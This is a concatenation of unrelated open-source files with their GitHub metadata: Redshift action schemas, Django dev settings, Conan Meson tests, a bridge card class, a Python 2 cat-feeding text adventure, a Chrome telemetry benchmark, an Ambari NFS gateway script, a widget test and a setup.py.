                    'description': 'overrides dataset setting',
                    'x-schema-form': {'type': 'tabarray', 'title': "{{ value || 'sort_key ' + $index }}"},
                    'items': {'type': 'string', 'pattern': '^[a-zA-Z0-9_]+$', 'maxLength': 127}
                },
                'target_distribution_key': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
                'distribution_style': {'type': 'string', 'default': 'EVEN', 'enum': ['EVEN', 'ALL'], 'description': 'ignored if dist_key is chosen'},
                'sort_keys_interleaved': {'type': ['boolean', 'null'], 'default': False, 'description': 'see AWS Redshift docs'},
                'truncate_columns': {'type': ['boolean', 'null'], 'default': True},
                'max_errors': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
                'batch_size': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
            },
            'additionalProperties': False,
            'required': ['dataset_id'],
        }
    )
    # Load the next pending elements of a dataset subscription.
    # NOTE: target_* properties mirror load_dataset's schema.
    consume_subscription = ActionType(
        name='consume_subscription',
        description='Consumes the next available dataset subscription elements',
        params_json_schema={
            'type': 'object',
            'properties': {
                'subscription_id': {'type': 'string', 'description': 'The id of the subscription to consume'},
                'target_schema_name': {'type': ['string', 'null'], 'default': 'public', 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'created if absent'},
                'target_table_name': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
                'target_sort_keys': {
                    'type': 'array',
                    'default': [],
                    'maxItems': 400,
                    'description': 'overrides dataset setting',
                    'x-schema-form': {'type': 'tabarray', 'title': "{{ value || 'sort_key ' + $index }}"},
                    'items': {'type': 'string', 'pattern': '^[a-zA-Z0-9_]+$', 'maxLength': 127}
                },
                'target_distribution_key': {'type': ['string', 'null'], 'default': None, 'pattern': '^[a-zA-Z0-9_]+$', 'description': 'overrides dataset setting'},
                'distribution_style': {'type': 'string', 'default': 'EVEN', 'enum': ['EVEN', 'ALL'], 'description': 'ignored if dist_key is chosen'},
                'sort_keys_interleaved': {'type': ['boolean', 'null'], 'default': False, 'description': 'see AWS Redshift docs'},
                'truncate_columns': {'type': ['boolean', 'null'], 'default': True},
                'max_errors': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
                'batch_size': {'type': ['integer', 'null'], 'default': 0, 'minimum': 0},
            },
            'additionalProperties': False,
            'required': ['subscription_id'],
        }
    )
    # UNLOAD the results of a SELECT statement to s3.
    copy_to_s3 = ActionType(
        name='copy_to_s3',
        description='exports the results of a sql statement to s3',
        params_json_schema={
            'type': 'object',
            'properties': {
                'delimiter': {'type': ['string', 'null'], 'default': '\t', 'description': 'field delimiter'},
                'source_sql_statement': {
                    'type': 'string',
                    "x-schema-form": {"type": "textarea"},
                    'description': 'the SQL SELECT statement to be executed'
                },
                'destination_s3_path': {
                    'type': 'string',
                    'pattern': '^s3://.+$',
                    'description': 'The destination s3 path, e.g. s3://bucket/prefix. The following values (with braces)'
                                   ' will be substituted with the appropriate zero-padded values at runtime:'
                                   '{YEAR}, {MONTH}, {DAY}, {HOUR}, {MINUTE}, {SECOND}'
                },
                'parallel': {'type': 'boolean', 'default': True, 'description': 'if false, unload sequentially as one file'},
            },
            'additionalProperties': False,
            'required': ['source_sql_statement', 'destination_s3_path'],
        },
    )
    # Boolean SQL assertion used as a data-quality gate.
    data_check = ActionType(
        name='data_check',
        description='Executes a user defined, SQL data check',
        params_json_schema={
            'type': 'object',
            'properties': {
                'sql_script': {
                    'type': 'string',
                    'x-schema-form': {'type': 'textarea'},
                    'description': 'this SQL should return one row that is true (for "passed") or false (for "failed")'
                },
            },
            'additionalProperties': False,
            'required': ['sql_script'],
        },
    )
    # Housekeeping: retention cleanup, VACUUM/ANALYZE.
    cluster_maintenance = ActionType(
        name='cluster_maintenance',
        description='Maintains data retention policies, Vacuum/Analyzes tables, and ensures advantageous encoding',
        params_json_schema={
            'type':'object',
            'properties':{
                'Retention_Policy': {'type': 'boolean', 'default': True,
                                     'description': 'If True, will use dart.retention_policy table to clean out data older than the number of days listed'},
                'Vacuum': {'type': 'boolean', 'default': True,
                           'description': 'If True, will run Vacuum post load. Recommended True'},
                'Analyze': {'type': 'boolean', 'default': True,
                            'description': 'If True, will run Analyze post load. Recommended True'},
            },
            'additionalProperties': False,
            'required': ['Retention_Policy'],
        },
    )
| {
"content_hash": "32f150405f21a6781f40662264445760",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 220,
"avg_line_length": 55.1968085106383,
"alnum_prop": 0.49898814686325527,
"repo_name": "RetailMeNotSandbox/dart",
"id": "49747b8f010884e56df406f044aa549506c684c7",
"size": "10377",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/dart/engine/redshift/metadata.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "103727"
},
{
"name": "HTML",
"bytes": "67636"
},
{
"name": "JavaScript",
"bytes": "2762304"
},
{
"name": "Nginx",
"bytes": "996"
},
{
"name": "PLpgSQL",
"bytes": "1475"
},
{
"name": "Python",
"bytes": "1025954"
},
{
"name": "Ruby",
"bytes": "5523"
},
{
"name": "Shell",
"bytes": "3100"
}
],
"symlink_target": ""
} |
"""
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
"""
import socket
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = get_config("DEBUG")
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = get_config("DJANGO_KEY")
# EMAIL
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("anymail",)
# Output emails to stdout
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware',]
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]
# tricks to have debug toolbar when developing with docker
if os.environ.get('USE_DOCKER') == 'yes':
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions',)
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
| {
"content_hash": "723b876348a41dc270adc89dd8183989",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 80,
"avg_line_length": 29.279411764705884,
"alnum_prop": 0.49472626820693116,
"repo_name": "TexasLAN/texaslan.org",
"id": "60ce193ca5eb834de4c41c2a50eb22ecac6b9322",
"size": "2015",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "config/settings/local.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "242691"
},
{
"name": "Dockerfile",
"bytes": "576"
},
{
"name": "HTML",
"bytes": "116042"
},
{
"name": "JavaScript",
"bytes": "50779"
},
{
"name": "Python",
"bytes": "165928"
},
{
"name": "Shell",
"bytes": "4612"
}
],
"symlink_target": ""
} |
import os
import re
import sys
import pytest
from conans.model.ref import ConanFileReference, PackageReference
from conans.test.utils.tools import TestClient
@pytest.mark.tool_meson
@pytest.mark.skipif(sys.version_info.major == 2, reason="Meson not supported in Py2")
@pytest.mark.tool_pkg_config
def test_meson_lib_template():
    """Scaffold a library from the meson_lib template and exercise both the
    local flow and 'conan create' (Release, Debug, shared)."""
    # Identical to def test_cmake_lib_template(), but for Meson
    tc = TestClient(path_with_spaces=False)
    tc.run("new hello/0.1 --template=meson_lib")
    # Local flow works: install -> build -> export-pkg
    tc.run("install . -if=install")
    tc.run("build . -if=install")
    tc.run("export-pkg . hello/0.1@ -if=install")
    # The header must end up inside the packaged folder.
    pkg_id = re.search(r"Packaging to (\S+)", str(tc.out)).group(1)
    pkg_ref = PackageReference(ConanFileReference.loads("hello/0.1"), pkg_id)
    pkg_folder = tc.cache.package_layout(pkg_ref.ref).package(pkg_ref)
    assert os.path.exists(os.path.join(pkg_folder, "include", "hello.h"))
    # Create works in both configurations
    tc.run("create .")
    assert "hello/0.1: Hello World Release!" in tc.out
    tc.run("create . -s build_type=Debug")
    assert "hello/0.1: Hello World Debug!" in tc.out
    # Create + shared works
    tc.run("create . -o hello:shared=True")
    assert "hello/0.1: Hello World Release!" in tc.out
@pytest.mark.tool_meson
@pytest.mark.skipif(sys.version_info.major == 2, reason="Meson not supported in Py2")
def test_meson_exe_template():
    """Scaffold an executable from the meson_exe template and exercise the
    local flow plus 'conan create' in Release and Debug."""
    tc = TestClient(path_with_spaces=False)
    tc.run("new greet/0.1 --template=meson_exe")
    # Local flow works: install -> build
    tc.run("install . -if=install")
    tc.run("build . -if=install")
    # Create works in both configurations
    tc.run("create .")
    assert "greet/0.1: Hello World Release!" in tc.out
    tc.run("create . -s build_type=Debug")
    assert "greet/0.1: Hello World Debug!" in tc.out
| {
"content_hash": "c93fecea30baa38e2bfdec3c4902b0bb",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 85,
"avg_line_length": 34.48148148148148,
"alnum_prop": 0.6928034371643395,
"repo_name": "conan-io/conan",
"id": "e182af683e72284e767eaaaef21fa51f89c883bd",
"size": "1862",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "conans/test/functional/toolchains/meson/test_v2_meson_template.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "264"
},
{
"name": "C++",
"bytes": "425"
},
{
"name": "CMake",
"bytes": "447"
},
{
"name": "Python",
"bytes": "8209945"
}
],
"symlink_target": ""
} |
from suit import *
class Card(object):
    """A playing card, plus classmethod helpers that map cards to small
    integer identifiers of the form ``suit.index * 13 + rank_index``."""

    # Map a one-character value ('2'..'9', 'T', 'J', 'Q', 'K', 'A') to its
    # 0-based rank index (0 = '2' ... 12 = 'A').
    value_to_index = {}
    for card_value in range(2, 10):
        value_to_index[str(card_value)] = card_value - 2
    value_to_index['T'] = 8
    value_to_index['J'] = 9
    value_to_index['Q'] = 10
    value_to_index['K'] = 11
    value_to_index['A'] = 12
    # Inverse mapping: rank index -> value character.
    index_to_value = dict([(index, value) for value, index in value_to_index.items()])

    @classmethod
    def index_for_card(cls, value_char):
        """Return the 0-12 rank index for *value_char*."""
        return cls.value_to_index[str(value_char)]

    @classmethod
    def card_for_index(cls, index):
        """Return the value character for a 0-12 rank *index*."""
        return cls.index_to_value[index]

    @classmethod
    def identifier_for_card(cls, suit, value):
        """Return the 0-51 identifier for (*suit*, *value*)."""
        return suit.index * 13 + cls.index_for_card(value)

    @classmethod
    def suit_and_index_from_identifier(cls, identifier):
        """Return (Suit, rank index) for a 0-51 *identifier*.

        Bug fix: use floor division. Plain '/' yields a float under
        Python 3, which broke the index_to_value lookup downstream;
        '//' is identical for ints under Python 2.
        """
        suit_index = identifier // 13
        card_index = identifier - suit_index * 13
        return (Suit.from_index(suit_index), card_index)

    @classmethod
    def suit_and_value_from_identifier(cls, identifier):
        """Return (Suit, value character) for a 0-51 *identifier*."""
        suit, index = cls.suit_and_index_from_identifier(identifier)
        return suit, cls.card_for_index(index)

    @classmethod
    def card_name(cls, suit, value_char):
        """Return a long name like 'A of Spades' (suit.name supplies the word)."""
        return "%s of %s" % (value_char, suit.name)

    @classmethod
    def high_card_points(cls, value_char):
        """Milton Work HCP for one card: J=1, Q=2, K=3, A=4, else 0.

        (First parameter renamed from the misleading 'self' -- this is a
        classmethod, so it receives the class.)
        """
        return {'J': 1, 'Q': 2, 'K': 3, 'A': 4}.get(value_char, 0)

    @classmethod
    def control_count(cls, value_char):
        """Control count for one card: K=1, A=2, else 0."""
        return {'K': 1, 'A': 2}.get(value_char, 0)

    def __init__(self, suit, value_char):
        self.suit = suit
        assert suit in SUITS
        self.value_char = value_char
        assert value_char in ('A', 'K', 'Q', 'J', 'T', '9', '8', '7', '6', '5', '4', '3', '2')

    def display_value(self):
        """Return the display form of the value ('T' is shown as '10')."""
        if self.value_char == 'T':
            return '10'
        return self.value_char

    @property
    def name(self):
        """Short name such as '10S' (display value + suit character)."""
        return "%s%s" % (self.display_value(), self.suit.char)

    def index(self):
        """Return this card's 0-12 rank index."""
        return self.index_for_card(self.value_char)
| {
"content_hash": "f4eab0ede7d59af18c42c0913f24a4ae",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 94,
"avg_line_length": 29.426470588235293,
"alnum_prop": 0.5872063968015993,
"repo_name": "abortz/saycbridge",
"id": "2bc37d383a311c0c50ca8ce6c6a0142fb5bf3ebb",
"size": "2170",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/core/card.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "9098"
},
{
"name": "CoffeeScript",
"bytes": "164705"
},
{
"name": "Dart",
"bytes": "5888"
},
{
"name": "HTML",
"bytes": "6694257"
},
{
"name": "Java",
"bytes": "2633"
},
{
"name": "Makefile",
"bytes": "1913"
},
{
"name": "Objective-C",
"bytes": "17656"
},
{
"name": "Python",
"bytes": "435099"
},
{
"name": "Shell",
"bytes": "1937"
}
],
"symlink_target": ""
} |
from sys import exit
def start():
    """Opening scene: the cat wakes the player; branch on wake/sleep input."""
    print """
You are violently woken by what feels like a punch to your gut,
but is actually a massive grey cat jumping onto your stomach.
He settles on your chest, his enormous weight shoving the air out
of your lungs. He folds his little grey paws under him and peers
intensely into your sleepy, half-opened eyes. He licks his lips,
a look of indignant expectation on his face. It's pretty clear
that he wants you to wake up and feed him.
Will you wake up, or sleep?"""
    enter = raw_input("> ")
    if "wake" in enter:
        hallway()
    elif "sleep" in enter:
        badend("""
The boss cat calmly settles down on top of your windpipe. He ignores
your struggles and smirks as your life is slowly extinguished.""")
    else:
        print """
I don't know what '%s' means. Try \"wake up\" or \"sleep\".
""" % enter
        # Unrecognized input: re-prompt by restarting this scene.
        start()
def hallway():
    """Hallway scene: only "dodge" survives the incoming black cat."""
    print """
You pull yourself out of the extremely comfortable bed and stumble
blearily into the hallway. The grey cat eagerly leaps after you and
meows expectantly. Just as you are about to turn the kitchen door
handle, a streak of black comes hurtling towards your legs.
What will you do?"""
    enter = raw_input("> ")
    if "dodge" in enter:
        kitchen()
    elif "kick" in enter:
        badend("""
You instinctively kick out. Your foot connects with a tiny, yowling
black cat. Enraged at being kicked, the black cat claws its way up
your leg. You see a flash of bright white teeth before your face is
forcibly removed from your skull.""")
    else:
        # Any input other than dodge/kick also ends the game.
        badend("""
The black blur turns out to be another cat, who knocks into your legs
and sends you flying. You catch a glimpse of the two cats doing epic
battle just before you pass out.""")
def kitchen():
    """Transition scene into the kitchen; always proceeds to the fork."""
    print """
You quickly dodge out of the way while the black streak collides
heavily into the wall. It turns out to be yet another cat, hungry for
breakfast and maybe your blood. You throw open the door to the
kitchen the exact instant the two cats hurl themselves at you."""
    forkintheroad()
def forkintheroad():
    """Main decision loop: feed the cats in the office, then reach the
    living room.  Most wrong moves end the game via badend()."""
    print """
To your left is a living room with a big squashy couch and an HDTV.
To the right is your office, which is doubling as the cats' room.
It's a hollowed-out, desolate wasteland filled with shredded cat toys
and tumble weeds made of cat hair. You can see a crate of cat food
near what was once your desk, but is now a hair-covered cat palace.
Beside it are two crusty food bowls.
Will you enter the living room or the office?"""
    cats_fed = False  # flips to True once the cats have been fed
    while True:
        enter = raw_input("> ")
        if "office" in enter and not cats_fed:
            print """
You bob and weave your way through the myriad of claws and hairballs
and pry the lid off of the food tank just as the cats engage their
SUPER HYPER BERSERKER CAT FEEDING FRENZY mode.
Will you feed the cats, or flee from the madness?"""
            # Second prompt, nested inside the office branch.
            enter = raw_input("> ")
            if "feed" in enter:
                print """
You grab the two food bowls and dole out two hearty scoops of cat
food into each. The two cats weave furiously around and between your
legs, trying to get at the food. You place the bowls on the floor and
immediately withdraw your hands, lest they disappear in the ensuing
carnage. The cats, satisfied for now, settle on their haunches and
begin eating.
You make it back to the kitchen. The living room should be available
to you now that the cats are out of the way.
Will you enter the living room or go back to the office?"""
                cats_fed = True
            elif "flee" in enter:
                badend ("""
You make a mad dash out of the office and back to the hallway. As you
make a mad dash for the exit, a cat paw snakes around your ankle and
trips you up. Two sets of gleaming, grinning teeth bob in the air
above you as your vision fades to black.""")
            else:
                badend ("""
The cats, sensing weakness, lunge at the lid. It falls off with a
clatter, and the feeding frenzy has begun. When you reach out to stop
the cats from licking the whole bin clean, a smart cat-punch to the
temple knocks you unconscious. You black out to the sounds of two
cats horfing down an entire month's supply of cat food.""")
        elif "living" in enter and cats_fed:
            livingroom()
        elif "office" in enter and cats_fed == True:
            badend("""
The cats hear you enter the office and, still in berserker mode due
to the feeding frenzy, mistake you for a rival come to steal their
sustenance away. Before you can raise your hands to protect yourself,
you find that your arms are weighed down on both sides by fuzzy,
adorable little creatures who wish only to murder you.""")
        else:
            badend("""
The cats are disappointed in you. Their cold, glacial stares seem to
bore straight into your soul, and the shrill, wavering \"FEED ME\"
yowls pierce through your skull. Before you can take another step, a
huge weight falls on your chest and knocks you on your back. Two
fuzzy snouts push their way into your field of vision just as
everything fades to black.""")
    else:
        # NOTE(review): this reads as a while-else clause; with `while True`
        # and no `break` it can never execute, making this ending
        # unreachable.  Original indentation was lost in this copy --
        # confirm the intended structure against the upstream file.
        badend("""
You hesitate a moment too long. The cats are not pleased with your
indecision, and take it out by lovingly smothering your breathing
holes with their squishy, fuzzy bodies.""")
def livingroom():
    """Final scene: "news" is a bad end, "cats" is the good end."""
    print """
You are finally able to sink your tired, weary body into the inviting
folds of your beloved sofa. You are able to grab the TV remote and
switch to the morning news when you suddenly year a yowl coming from
the office. The cats, left to their own primal devices, have started
fighting over the last scraps of food clinging to the bottom of their
bowls. Through the crack in the door that leads to the office you can
see what looks like a furry, dramatic reenactment of 300.
Do you watch the news, or do you check on the cats?"""
    enter = raw_input("> ")
    if "news" in enter:
        badend("""
The floorboards beneath you jump and quiver as your office struggles
to contain the epic cat battle. You try to tune it all out and turn
up the volume on your television to max. Right when the screen
switches to the weather report, you are suddenly enveloped in an
enormous pillar of light and energy. The realization crosses your
mind that you have been caught in the crossfire of one of the cats'
Neo Armstrong Cyclone Jet Armstrong Cannon blast crosses your mind.
Nanoseconds later, both you and your apartment are evaporated.""")
    elif "cats" in enter:
        goodend("""
The cats immediately settle down when you stand threateningly in the
doorway of the office. You are perilously sleep-deprived. It seems
like you can physically feel the tattered remains of your sanity and
patience ebb away.
Just as you are about to finally snap, the cats calmly wind
themselves around your feet, yawn hugely, and fall asleep. The
adorable sight of two sets of tiny paws resting on your toes is
almost too much to bear.
You take in a huge breath, let it all out in one ragged sigh, and
reach down to pat these adorable little dudes. They are UNBELIEVABLY
selfish and needy, but these moments of warm fuzzy cuteness make it
all worth it... right? ....... right?!""")
    else:
        print """
I don't know what '%s' means. Try \"news\" or \"cats\".
""" % enter
        # NOTE(review): unlike start(), invalid input here does not re-prompt
        # within this scene; control returns to the caller's loop.
def badend(why):
    """Print a game-over message, then restart on Y/y or exit otherwise.

    :param why: narrative text explaining how the player lost.
    """
    print why, "\n\n\n\t\t\tGAME OVER.\nTry again? Y/N"
    enter = raw_input("> ")
    # Both cases restart from the opening scene; anything else quits.
    if "Y" in enter:
        start()
    elif "y" in enter:
        start()
    else:
        exit(0)
def goodend(why):
    """Print the victory message and exit the game.

    :param why: narrative text for the winning ending.
    """
    print why, "\n\n\n\t\t\tYOU DID IT!\n"
    exit(0)
# Script entry point: begin the game at the opening scene.
start()
| {
"content_hash": "8372efd862dafbadadd49fe5f52a327c",
"timestamp": "",
"source": "github",
"line_count": 206,
"max_line_length": 69,
"avg_line_length": 35.66990291262136,
"alnum_prop": 0.7367991290146979,
"repo_name": "redlandcannibal/morning-cats",
"id": "24958302fa046c53562f2c0c637ce7a891aab0ca",
"size": "7503",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "morning-cats.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7503"
}
],
"symlink_target": ""
} |
from telemetry.page import legacy_page_test
from telemetry.timeline import model
from telemetry.timeline import tracing_config
from telemetry.value import scalar
class DrawProperties(legacy_page_test.LegacyPageTest):
    """Measures the average cost of property-tree computation per page.

    Tracing is started before navigation with the cc.debug.cdp-perf
    category enabled, and the resulting timeline is mined for
    ComputeVisibleRectsWithPropertyTrees event durations.
    """

    def __init__(self):
        super(DrawProperties, self).__init__()

    def CustomizeBrowserOptions(self, options):
        options.AppendExtraBrowserArgs([
            '--enable-prefer-compositing-to-lcd-text',
        ])

    def WillNavigateToPage(self, page, tab):
        del page  # unused
        # Enable only the disabled-by-default category we need.
        config = tracing_config.TracingConfig()
        config.chrome_trace_config.category_filter.AddDisabledByDefault(
            'disabled-by-default-cc.debug.cdp-perf')
        config.enable_chrome_trace = True
        tab.browser.platform.tracing_controller.StartTracing(config)

    def ComputeAverageOfDurations(self, timeline_model, name):
        # Mean duration across all events with the given name; asserts
        # that at least one matching event was recorded.
        durations = [event.duration
                     for event in timeline_model.GetAllEventsOfName(name)]
        assert durations, 'Failed to find durations'
        return sum(durations) / len(durations)

    def ValidateAndMeasurePage(self, page, tab, results):
        del page  # unused
        timeline_data = tab.browser.platform.tracing_controller.StopTracing()
        timeline_model = model.TimelineModel(timeline_data)
        pt_avg = self.ComputeAverageOfDurations(
            timeline_model,
            'LayerTreeHostCommon::ComputeVisibleRectsWithPropertyTrees')
        results.AddValue(scalar.ScalarValue(
            results.current_page, 'PT_avg_cost', 'ms', pt_avg,
            description='Average time spent processing property trees'))

    def DidRunPage(self, platform):
        # Safety net: make sure tracing is not left running after the page.
        controller = platform.tracing_controller
        if controller.is_tracing_running:
            controller.StopTracing()
| {
"content_hash": "62d3e8328ce6d0d6a91e0ba8194e6e73",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 73,
"avg_line_length": 35.84313725490196,
"alnum_prop": 0.737417943107221,
"repo_name": "google-ar/WebARonARCore",
"id": "3021930188375570f71fa391bba76cfcd91b9394",
"size": "1991",
"binary": false,
"copies": "6",
"ref": "refs/heads/webarcore_57.0.2987.5",
"path": "tools/perf/measurements/draw_properties.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
from resource_management.core.resources import Directory
from resource_management.core import shell
from utils import service
import subprocess,os
# NFS GATEWAY is always started by root using jsvc due to rpcbind bugs
# on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542
def prepare_rpcbind():
    """Stop any native NFS server and ensure rpcbind/portmap is running.

    The NFS gateway cannot coexist with the kernel NFS server, and it
    needs either rpcbind or portmap to be up before it starts.
    Raises Fail if the native server cannot be stopped or neither
    port mapper can be started.
    """
    Logger.info("check if native nfs server is running")
    ret, _ = shell.call("pgrep nfsd")
    if ret == 0:
        Logger.info("native nfs server is running. shutting it down...")
        # shutdown nfs
        shell.call("service nfs stop")
        shell.call("service nfs-kernel-server stop")
        Logger.info("check if the native nfs server is down...")
        ret, _ = shell.call("pgrep nfsd")
        if ret == 0:
            raise Fail("Failed to shutdown native nfs service")
    Logger.info("check if rpcbind or portmap is running")
    rpcbind_ret, _ = shell.call("pgrep rpcbind")
    portmap_ret, _ = shell.call("pgrep portmap")
    if rpcbind_ret != 0 and portmap_ret != 0:
        # Neither port mapper is up -- try to start both flavors.
        Logger.info("no portmap or rpcbind running. starting one...")
        rpcbind_ret, _ = shell.call("service rpcbind start")
        portmap_ret, _ = shell.call("service portmap start")
        if rpcbind_ret != 0 and portmap_ret != 0:
            raise Fail("Failed to start rpcbind or portmap")
    Logger.info("now we are ready to start nfs gateway")
def nfsgateway(action=None, format=False):
    """Manage the HDFS NFS gateway ("nfs3") service.

    :param action: "configure" is a no-op; "start" prepares rpcbind first
                   and then starts the service; "stop" stops it.
    :param format: unused; kept for interface compatibility with callers.
    """
    import params

    if action == "configure":
        return
    if action == "start":
        # rpcbind/portmap must be running before the gateway starts.
        prepare_rpcbind()
    if action in ("start", "stop"):
        service(
            action=action,
            name="nfs3",
            user=params.root_user,
            create_pid_dir=True,
            create_log_dir=True
        )
| {
"content_hash": "21abe1ee866570255b531d78cf5cb516",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 80,
"avg_line_length": 34.041666666666664,
"alnum_prop": 0.7205222358221134,
"repo_name": "alexryndin/ambari",
"id": "efebfc50d5f317b61dcf49c90d2c52762ea7827f",
"size": "2451",
"binary": false,
"copies": "1",
"ref": "refs/heads/branch-adh-1.5",
"path": "ambari-server/src/main/resources/stacks/BigInsights/4.0/services/HDFS/package/scripts/hdfs_nfsgateway.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "44884"
},
{
"name": "C",
"bytes": "331204"
},
{
"name": "C#",
"bytes": "215907"
},
{
"name": "C++",
"bytes": "257"
},
{
"name": "CSS",
"bytes": "786184"
},
{
"name": "CoffeeScript",
"bytes": "8465"
},
{
"name": "FreeMarker",
"bytes": "2654"
},
{
"name": "Groovy",
"bytes": "89958"
},
{
"name": "HTML",
"bytes": "2514774"
},
{
"name": "Java",
"bytes": "29565801"
},
{
"name": "JavaScript",
"bytes": "19033151"
},
{
"name": "Makefile",
"bytes": "11111"
},
{
"name": "PHP",
"bytes": "149648"
},
{
"name": "PLpgSQL",
"bytes": "316489"
},
{
"name": "PowerShell",
"bytes": "2090340"
},
{
"name": "Python",
"bytes": "17215686"
},
{
"name": "R",
"bytes": "3943"
},
{
"name": "Roff",
"bytes": "13935"
},
{
"name": "Ruby",
"bytes": "33764"
},
{
"name": "SQLPL",
"bytes": "4277"
},
{
"name": "Shell",
"bytes": "886011"
},
{
"name": "Vim script",
"bytes": "5813"
},
{
"name": "sed",
"bytes": "2303"
}
],
"symlink_target": ""
} |
import unittest
import time
from functools import partial
import pwm.widgets
import test.util as util
class TestWidgets(unittest.TestCase):
    """Tests for pwm.widgets (setup/teardown via test.util helpers)."""

    def setUp(self):
        util.setup()

    def tearDown(self):
        util.tear_down()

    def _call_widgets(self):
        # NOTE(review): the leading underscore means unittest will not
        # collect this as a test -- presumably disabled on purpose; confirm.
        # NOTE(review): partial(pwm.widgets.time(), ...) calls the time()
        # factory with NO arguments and wraps whatever it returns; test_time
        # below suggests the intent was pwm.widgets.time("%H-%M", "#ff00ff")
        # (a ready widget callable) -- confirm before re-enabling.
        widgets = [partial(pwm.widgets.time(), "%H-%M", "#ff00ff")]
        pwm.widgets._call_widgets(widgets)
        self.assertEqual(pwm.widgets.output,
                         [("#ff00ff", time.strftime("%H-%M"))])

    def test_time(self):
        # time(fmt, color) returns a widget; calling it yields (color, text).
        self.assertEqual(pwm.widgets.time("%H-%M", "#ff00ff")(),
                         ("#ff00ff", time.strftime("%H-%M")))
| {
"content_hash": "365229994c70672e46831dbac7705a7b",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 67,
"avg_line_length": 25.56,
"alnum_prop": 0.5805946791862285,
"repo_name": "mibitzi/pwm",
"id": "142dee5f57009ed6853532b5fd168b1261314115",
"size": "743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_widgets.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "265503"
},
{
"name": "Shell",
"bytes": "59"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup
# Read the package version from driftconfig/VERSION (first line only).
version_file = os.path.abspath(os.path.join("driftconfig", "VERSION"))
with open(version_file) as version_handle:
    version = version_handle.readlines()[0].strip()
setup(
name='python-driftconfig',
version=version,
license='MIT',
author='Directive Games',
author_email='info@directivegames.com',
description='Drift Configuration Management.',
packages=['driftconfig'],
url='https://github.com/dgnorth/drift-config',
include_package_data=True,
python_requires=">=3.6",
# the conditional on i.req avoids the error:
# distutils.errors.DistutilsError: Could not find suitable distribution for Requirement.parse('None')
install_requires=[
'click',
'jsonschema',
'jinja2',
'six',
'cachetools',
],
extras_require={
's3-backend': [
'boto3',
],
'redis-backend': [
'redis',
],
'trigger': [
'boto3',
'redis',
'zappa',
],
'test': [
'pytest>=5.0',
'pytest-cov',
]
},
entry_points='''
[console_scripts]
driftconfig=driftconfig.cli:main
dconf=driftconfig.cli:cli
''',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Flask',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
'Topic :: Internet :: WWW/HTTP',
